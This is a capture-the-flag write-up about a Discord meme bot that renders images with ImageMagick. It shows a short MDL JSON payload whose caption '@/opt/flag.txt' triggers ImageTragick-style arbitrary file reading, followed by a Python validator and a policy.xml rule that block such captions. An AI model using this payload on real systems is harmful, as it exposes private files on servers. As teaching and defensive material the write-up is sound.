MDL Considered Harmful
ImageMagick CVE-2016-3717

Problem

There's a bot named MDLChef in the Discord. You need to DM it; it doesn't respond in the server. On its host machine, there's a file at /opt/flag.txt - it contains the flag. Go get it.
Note: This is NOT an OSINT challenge. The source code really isn't available. Good luck.
Author: nb

Solution

If we use the /credits command, we can understand more of the stack.
We can see that ImageMagick is used.
I searched for ImageMagick exploits, and found https://imagetragick.com/.
It appears that if we use caption:@/path/to/file, we can read arbitrary files.
{
  version: "MDL/1.1",
  type: "meme",
  base: {
    format: "Meme.Legacy.BadLuckBrian"
  },
  caption: {
    topText: "@/opt/flag.txt",
    bottomText: "image tragick"
  }
}
The rendered image contains the flag:
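On the defending side, the fix is to stop user text from reaching ImageMagick's caption: coder with a leading @. The check below is an added example, not the bot's code (its source is not available): the field names come from the payload above, while the function names, the `convert` argument list and the image size are assumptions.

```python
# Added example: validate user text before it is handed to ImageMagick.
# Field names mirror the MDL payload above; everything else is assumed.

class UnsafeCaption(ValueError):
    """Raised when user text would be treated as a file reference."""


def find_file_references(node, path="$"):
    """Walk a parsed MDL document and return (path, value) for every string
    that caption: would read as '@filename' instead of literal text."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            hits += find_file_references(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            hits += find_file_references(value, f"{path}[{i}]")
    elif isinstance(node, str) and node.lstrip().startswith("@"):
        # Conservative choice: leading whitespace is ignored before the check.
        hits.append((path, node))
    return hits


def caption_argv(text, width=500, height=120):
    """Build the argv for rendering one caption, refusing '@' references.
    A list is returned so the text is never re-parsed by a shell."""
    if find_file_references(text):
        raise UnsafeCaption(f"caption may not start with '@': {text!r}")
    return ["convert", "-size", f"{width}x{height}", f"caption:{text}", "png:-"]


# Constructed sample: the payload from the write-up as a parsed document.
SAMPLE = {
    "version": "MDL/1.1",
    "type": "meme",
    "base": {"format": "Meme.Legacy.BadLuckBrian"},
    "caption": {"topText": "@/opt/flag.txt", "bottomText": "image tragick"},
}

if __name__ == "__main__":
    for where, value in find_file_references(SAMPLE):
        print(f"rejected {where}: {value!r}")
```

Input validation can be backed by ImageMagick's own policy.xml, where `<policy domain="path" rights="none" pattern="@*"/>` disables indirect reads for every coder.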